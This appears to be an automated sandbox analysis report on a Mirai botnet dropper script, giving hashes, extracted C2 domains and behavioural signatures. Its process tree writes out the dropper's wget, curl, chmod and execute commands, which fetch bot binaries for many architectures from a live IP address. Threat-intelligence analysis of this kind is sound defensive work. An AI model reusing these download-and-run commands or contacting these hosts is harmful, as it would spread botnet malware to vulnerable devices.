Overview

overview

10

Static

static

1

51.79.141....113.sh

ubuntu-18.04-amd64

10

51.79.141....113.sh

debian-9-armhf

10

51.79.141....113.sh

debian-9-mips

10

51.79.141....113.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    29-12-2024 21:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    51.79.141.121-sora.sh-2024-12-29T211113.sh

  • Size

    2KB

  • MD5

    0569b09a5951d5fe444efa1892b87687

  • SHA1

    0d3df40a37ec718be33d83c1c9a962e982a51d17

  • SHA256

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

  • SHA512

    fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Score
10/10
miraicondibotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

report.tfmobile.store

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (39150) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 18 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Writes file to system bin folder 9 IoCs
  • Changes its process name 9 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 10 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    1⤵
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:740
    • /bin/cat
      cat botx.x86
      2⤵
        PID:741
      • /bin/chmod
        chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
        2⤵
        • File and Directory Permissions Modification
        PID:742
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        PID:743
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:745
      • /usr/bin/curl
        curl -O http://51.79.141.121/where/botx.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:752
      • /bin/cat
        cat botx.mips
        2⤵
        • System Network Configuration Discovery
        PID:773
      • /bin/chmod
        chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
        2⤵
        • File and Directory Permissions Modification
        PID:774
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:775
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.x86_64
        2⤵
          PID:778
        • /usr/bin/curl
          curl -O http://51.79.141.121/where/botx.x86_64
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:788
        • /bin/chmod
          chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
          2⤵
          • File and Directory Permissions Modification
          PID:801
        • /tmp/robben
          ./robben Payload
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:802
        • /usr/bin/wget
          wget http://51.79.141.121/where/botx.i468
          2⤵
            PID:834
          • /usr/bin/curl
            curl -O http://51.79.141.121/where/botx.i468
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:835
          • /bin/chmod
            chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
            2⤵
            • File and Directory Permissions Modification
            PID:839
          • /tmp/robben
            ./robben Payload
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            PID:840
          • /usr/bin/wget
            wget http://51.79.141.121/where/botx.i686
            2⤵
              PID:842
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.i686
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:843
            • /bin/chmod
              chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
              2⤵
              • File and Directory Permissions Modification
              PID:847
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:848
            • /usr/bin/wget
              wget http://51.79.141.121/where/botx.mpsl
              2⤵
              • Writes file to tmp directory
              PID:853
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.mpsl
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:856
            • /bin/chmod
              chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
              2⤵
              • File and Directory Permissions Modification
              PID:858
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:859
            • /usr/bin/wget
              wget http://51.79.141.121/where/botx.arm4
              2⤵
                PID:861
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm4
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:862
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
                2⤵
                • File and Directory Permissions Modification
                PID:866
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:867
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm5
                2⤵
                • Writes file to tmp directory
                PID:869
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm5
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:872
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
                2⤵
                • File and Directory Permissions Modification
                PID:874
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:875
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm6
                2⤵
                • Writes file to tmp directory
                PID:877
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm6
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:880
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
                2⤵
                • File and Directory Permissions Modification
                PID:882
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:883
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm7
                2⤵
                • Writes file to tmp directory
                PID:885
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm7
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:888
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
                2⤵
                • File and Directory Permissions Modification
                PID:890
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:891
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.ppc
                2⤵
                  PID:893

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/botx.x86
                Filesize

                50KB

                MD5

                1092f7846a6ca7a5e92ece0ea93ff82e

                SHA1

                140fd3e84c49d382e6b0f9a40730d1cd465f8347

                SHA256

                a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

                SHA512

                11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba

                Download Submit

              • /tmp/robben
                Filesize

                71KB

                MD5

                b5aeba1a09f5198a71db73371f6e01b6

                SHA1

                246b98370fdf429e94ab4ca087828acabbbebd9c

                SHA256

                7a81d936e21b859c70565eddf8e6e50658f6dff077a53adb0ec3cf313ce9f71f

                SHA512

                68db247b59d9fe3e030d56e48f2032c6e0d4bf203aef4e850da7dcda7185e60370fa577f2b97f9b6026b0599ae35ecca9fb48c8ace300d9820fb6a16b5722c57

                Download Submit